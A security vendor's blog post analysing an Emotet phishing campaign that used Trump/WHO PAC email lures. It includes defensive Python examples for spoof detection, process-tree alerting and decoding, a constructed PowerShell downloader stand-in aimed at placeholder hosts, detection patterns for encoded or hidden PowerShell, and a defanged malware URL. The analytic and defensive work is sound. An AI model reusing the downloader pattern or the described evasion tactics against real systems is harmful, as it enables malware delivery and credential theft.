This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. Learn more.
Following the recent return of Emotet after a five-month hiatus, a newly discovered phishing campaign is using updated tactics, leveraging the hype surrounding President Trump’s decision to halt U.S. funding for the World Health Organization (WHO). In a ruse to drop this dangerous banking trojan, the malicious messages take the form of a typical Political Action Committee (PAC) email, eliciting support for presidential incumbent Donald Trump in the upcoming 2020 election.
First caught by Area 1 Security on August 21st, this ongoing campaign contains all the hallmarks of the resurgence of Emotet:
- Leveraging stolen email content
- Subject lines prefaced with “Fwd:” and “RE:”
- PowerShell commands to download and execute the malware
This campaign, however, aims to compromise politically-related entities rather than just the typical targets of opportunity that are commonly associated with this banking trojan. In Figure 1, you can see how the attacker forwards a legitimate PAC mailer to develop a false sense of legitimacy, with entirely authentic content throughout the body of the message. Every link works and leads to benign web pages of the impersonated PAC.
Like a wolf in sheep’s clothing, the attacker disguises the Emotet delivery mechanism as messaging about timely, highly publicized, hot-button political issues.
The subject of the email reads “Fwd:Breaking: President. Trump suspends funding to WHO,” and the attacker employs Display Name Spoofing in an attempt to mask the true sender address. The actual sender addresses used to spread the phishing messages vary, but all have one thing in common: each is a legitimate account compromised by the attacker to launch this fraudulent WHO-themed campaign.
A closer look at the attacker’s infrastructure reveals compromised hosts used to relay the phishing messages, such as the sending Mail Transfer Agent (MTA) server[.]websoftperu[.]com. Area 1 Security suspects that this MTA may have been compromised through an exposed SSH port running an outdated OpenSSH release (7.4, from late 2016) that has a number of published vulnerabilities. A version banner alone does not prove an exploitable build, since some distributions backport fixes while keeping the old version string, but it is consistent with an unmaintained host.
- Compromised email accounts of several small businesses around the world were used in each wave of this campaign, again luring victims with the same stolen PAC email content.
- One of these accounts is also connected to similar phishing messages with slightly different lures, all with the intent to infect targets with Emotet.
- The example account shown above is, in particular, the source of various politically themed phishing messages containing stolen content from a number of different PAC mailers, and it was observed targeting politically affiliated email accounts.
The attacker primarily uses compromised accounts so that the messages pass email authentication checks such as SPF, DKIM, and DMARC.
Whereas other malicious actors look for sender domains that lack these protocols or have them misconfigured, this attacker leverages correctly configured authentication to their advantage: mail sent from a legitimate mailbox through its domain’s authorized mail server authenticates by construction. This tactic lets the attacker bypass legacy vendors that rely solely on these authentication results as indicators of maliciousness.
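To make this concrete, here is an added example (not code from the original post or from Area 1 Security) that parses a message’s Authentication-Results header and shows why a clean SPF/DKIM/DMARC pass is not a verdict. The sample message, the organisation name “Example Victory PAC”, and the domains examplepac.org and smallbiz.example are all constructed for this illustration. The check that actually fires is the one described above: a display name claiming an organisation whose mail does not come from the sending domain, on a message that otherwise authenticates perfectly.

```python
import email
import re
from email.utils import parseaddr

# Hypothetical organisation the attacker impersonates in the display name, mapped
# to the domain its genuine mail comes from (both assumed for this example).
KNOWN_SENDERS = {"example victory pac": "examplepac.org"}

# Constructed sample (not a message from the campaign). It authenticates cleanly
# because it was sent from a compromised mailbox at smallbiz.example through that
# domain's own mail server, yet the display name claims to be the PAC.
SAMPLE_MESSAGE = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=smallbiz.example;
 dkim=pass header.d=smallbiz.example;
 dmarc=pass (p=reject) header.from=smallbiz.example
From: "Example Victory PAC" <bookkeeping@smallbiz.example>
Subject: Fwd:Breaking: President. Trump suspends funding to WHO

Forwarded PAC mailer content goes here.
"""

# Same headers, but the address really belongs to the organisation named (constructed).
LEGITIMATE_MESSAGE = SAMPLE_MESSAGE.replace(
    "bookkeeping@smallbiz.example", "news@examplepac.org"
)

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)


def parse_auth_results(msg):
    """Return {'spf': 'pass', 'dkim': ..., 'dmarc': ...} from Authentication-Results."""
    header = msg.get("Authentication-Results", "")
    # The header is usually folded across several lines; flatten before matching.
    flat = " ".join(header.split())
    return {m.group(1).lower(): m.group(2).lower() for m in AUTH_RE.finditer(flat)}


def display_name_spoof(msg, known_senders=KNOWN_SENDERS):
    """Return the expected domain when the display name claims a known organisation
    but the From address lives at a different domain; None otherwise."""
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    for org, domain in known_senders.items():
        if org in name.lower() and from_domain != domain:
            return domain
    return None


def triage(raw):
    """Summarise authentication state and the display-name check for one message."""
    msg = email.message_from_string(raw)
    auth = parse_auth_results(msg)
    authenticated = all(auth.get(m) == "pass" for m in ("spf", "dkim", "dmarc"))
    expected = display_name_spoof(msg)
    return {
        "auth": auth,
        "authenticated": authenticated,
        "display_name_spoof": expected is not None,
        "expected_domain": expected,
        # A compromised account passes all three checks by construction, so the
        # verdict must rest on content and identity signals, not on the pass.
        "suspicious": expected is not None,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MESSAGE))
    print(triage(LEGITIMATE_MESSAGE))
```

The point of the two constants is the contrast: both messages carry identical pass results, and only the relationship between the claimed identity and the sending domain separates them. In practice the known-sender table would be populated from the organisations a tenant actually corresponds with rather than a hand-written dictionary.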
There is approximately one week of turnover time between each wave of the campaign as the attacker retools to get ahead of defenses. This includes various changes, such as modifying the weaponized attachment and using new compromised sender infrastructure and accounts.
Efforts like this easily let the attacker circumvent signature-based detections that depend on IP addresses and payload hashes of known threats, leading defenders through a never-ending game of cat and mouse.
Analysis of Malware
At the bottom of the phishing message is a Microsoft Word document that uses VBA macros to drop the first-stage payload, the Emotet downloader. After opening the document, the user is prompted by a dialog box to enable editing and content, as depicted below.
Merely clicking this button enables a highly obfuscated VBA macro (as shown in Figure 3) that launches an equally obfuscated PowerShell command through Windows Management Instrumentation (WMI). Because the process is created by the WMI provider host rather than by Word itself, PowerShell does not appear as a direct child of WINWORD.EXE in the process tree.
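As an added example (not from the original post or from Area 1 Security), the following detection logic runs over constructed process-creation events modelled on Sysmon Event ID 1 fields; the hostnames, PIDs, paths and the placeholder base64 blob are all assumed. It encodes the practical consequence of the WMI hop: the PowerShell process shows up under WmiPrvSE.exe rather than WINWORD.EXE, so a rule that only looks for Office spawning a shell misses it. The example therefore keys on WmiPrvSE.exe launching a hidden or encoded PowerShell, and correlates that with an Office process having opened a document on the same host shortly before.

```python
import re
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -e / -enc / -EncodedCommand and -w hidden / -WindowStyle hidden, case-insensitive.
ENCODED = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\b")
HIDDEN = re.compile(r"(?i)(?:^|\s)[-/](?:w|win|windowstyle)\s+hidden\b")

# Constructed events modelled on Sysmon Event ID 1 fields (hostnames, PIDs, paths
# and the base64 placeholder are assumed; this is not telemetry from the campaign).
# Note the third event: the macro's WMI call makes WmiPrvSE.exe the parent.
SAMPLE_EVENTS = [
    {"time": "2020-08-21T14:02:10", "host": "WS01", "pid": 4120, "ppid": 3308,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\LG-7231 Medical report Covid-19.doc"'},
    {"time": "2020-08-21T14:02:41", "host": "WS01", "pid": 5200, "ppid": 1012,
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"time": "2020-08-21T14:02:42", "host": "WS01", "pid": 5316, "ppid": 5200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"powershell -w hidden -enc AAAAAAAAAAAAAAAAAAAA"},  # placeholder blob
    # Benign WMI-launched admin script on another host: no encoding, no hidden
    # window, no recent Office activity, so it must not alert.
    {"time": "2020-08-21T15:10:00", "host": "WS02", "pid": 7001, "ppid": 6900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
]


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events, office_window=timedelta(minutes=5)):
    """Return one alert per shell spawned directly from Office or via WmiPrvSE.exe."""
    alerts = []
    last_office = {}  # host -> time an Office process was last created
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        img, parent = basename(ev["image"]), basename(ev["parent_image"])
        if img in OFFICE:
            last_office[ev["host"]] = t
            continue
        if img not in SHELLS:
            continue
        cmd = ev["command_line"]
        encoded = bool(ENCODED.search(cmd))
        hidden = bool(HIDDEN.search(cmd))
        recent = ev["host"] in last_office and t - last_office[ev["host"]] <= office_window
        if parent in OFFICE:
            alerts.append({"rule": "office_spawns_shell", "host": ev["host"],
                           "pid": ev["pid"], "encoded": encoded})
        elif parent == "wmiprvse.exe" and (encoded or hidden or recent):
            alerts.append({"rule": "wmi_spawns_shell", "host": ev["host"],
                           "pid": ev["pid"], "encoded": encoded,
                           "office_recently_active": recent})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The WS02 event is there to show the false-positive boundary: WmiPrvSE.exe launching PowerShell is routine in managed environments, so the rule fires only when the launch carries encoding or window-hiding flags, or follows document activity on the same host within the window.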
Figure 4 shows a sampling of the PowerShell script after Area 1 Security researchers deobfuscated most of the code. The script attempts to download Emotet from a hardcoded list of compromised WordPress sites, running through the list (highlighted below) to find one that is still actively hosting the trojan.
Area 1 Security found that, among the compromised sites hardcoded in the malware, only the link hxxp://cammis[.]com[.]br/wp-admin/8IArx/ was still active at the time of analysis. Once the final payload is found on a functioning site, it is downloaded to a folder on the victim’s device under %USERPROFILE%\AppData\Local\. From there, a message is sent back to the Emotet command and control (C2) server, confirming that the payload was successfully downloaded.
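The downloader behaviour described above, as an added example that is not the script from the sample or code from Area 1 Security: a small triage helper that strips the PowerShell -EncodedCommand layer (base64 over UTF-16LE), pulls the ‘@’-joined URL list out, defangs the URLs in the hxxp://host[.]tld notation used in this post, and flags the drop location. The embedded script is a constructed stand-in that mirrors the described probe-until-one-works loop using reserved .example domains only, and it is never executed here. Real samples stack further string-obfuscation layers on top of the encoding, which this example does not attempt to undo.

```python
import base64
import re

# Constructed stand-in for the downloader script (not the sample's actual code):
# candidate URLs joined with '@' are tried in turn until one returns a file large
# enough to be the real payload, written under %USERPROFILE%\AppData\Local.
SAMPLE_SCRIPT = r"""$urls = 'http://site-one.example/wp-admin/AbCdE/@http://site-two.example/wp-content/xYz9/@https://site-three.example/wp-includes/Q1w2/'.Split('@');
$out = $env:USERPROFILE + '\AppData\Local\' + 'ab12cd3' + '.exe';
foreach ($u in $urls) {
  try {
    (New-Object Net.WebClient).DownloadFile($u, $out);
    if ((Get-Item $out).Length -ge 30000) { break }
  } catch { }
}"""

# Excluding '@' from the URL character class splits the '@'-joined list for free.
URL_RE = re.compile(r"https?://[^\s'\"@]+")
# Drop location reported above; backslashes may be doubled in some variants.
LOCAL_APPDATA_RE = re.compile(r"(?i)appdata\\+local")


def encode_command(script):
    """Encode a script the way powershell -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse of encode_command: the first layer to strip from a -enc argument."""
    return base64.b64decode(blob).decode("utf-16-le")


def extract_urls(script):
    """Return the candidate payload URLs in the order the script tries them."""
    return URL_RE.findall(script)


def defang(url):
    """Render a URL in the hxxp://host[.]tld form used in this post's IoCs."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def triage(blob):
    """Decode an -EncodedCommand blob and summarise the downloader's IoCs."""
    script = decode_command(blob)
    return {
        "urls": [defang(u) for u in extract_urls(script)],
        "writes_to_local_appdata": bool(LOCAL_APPDATA_RE.search(script)),
    }


if __name__ == "__main__":
    # Encode the constructed script first so the example round-trips offline.
    report = triage(encode_command(SAMPLE_SCRIPT))
    for url in report["urls"]:
        print(url)
    print("writes under AppData\\Local:", report["writes_to_local_appdata"])
```

Each extracted URL is a candidate for the compromised-site IoC list; the defanged form is what should go into a report, and the raw form is what a sandbox or URL-reputation lookup would consume.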
What Makes Emotet Difficult to Detect?
Emotet is among the most destructive and costly malware families, affecting both the public and private sectors. Once this advanced, modular banking trojan compromises a device, other hosts on the network are at risk of infection, as its worm-like spreading modules let it propagate to other connected machines. From there the attacker has essentially free rein over sensitive information on the compromised hosts.
Since Emotet is primarily delivered via attachments or links in phishing emails, the attacker takes extra measures to ensure the messages will not trigger legacy email security solutions. These tactics range from simply changing the name and hash of the malicious file to more advanced anti-debugging and host-environment analysis capabilities.
Emotet’s modular Dynamic Link Libraries (DLLs) and polymorphic nature give the attacker not only continuously evolving capabilities but also effortless evasion of signature-based detection systems. Analysis of this evasive trojan presents challenges for those attempting to reverse the malware, as it is virtual-environment aware and will sleep indefinitely in an attempt to render debugging techniques ineffective. With malicious actors using constantly evolving malware, new and advanced techniques are needed to detect and catch these phishing messages before they reach users’ inboxes.
Area 1 Security’s advanced machine learning and artificial intelligence technology leverages algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time, rather than waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction, in that the user is never exposed to the attack.
Indicators of Compromise
Compromised Sender Email Addresses:
Sender IP Addresses:
Compromised Emotet Websites:
Attachment File Names:
LG-7231 Medical report Covid-19.doc
IQ-5125 Medical report Covid-19.doc
PowerShell Executables (file names are fixed-length, consisting of seven alphanumeric characters):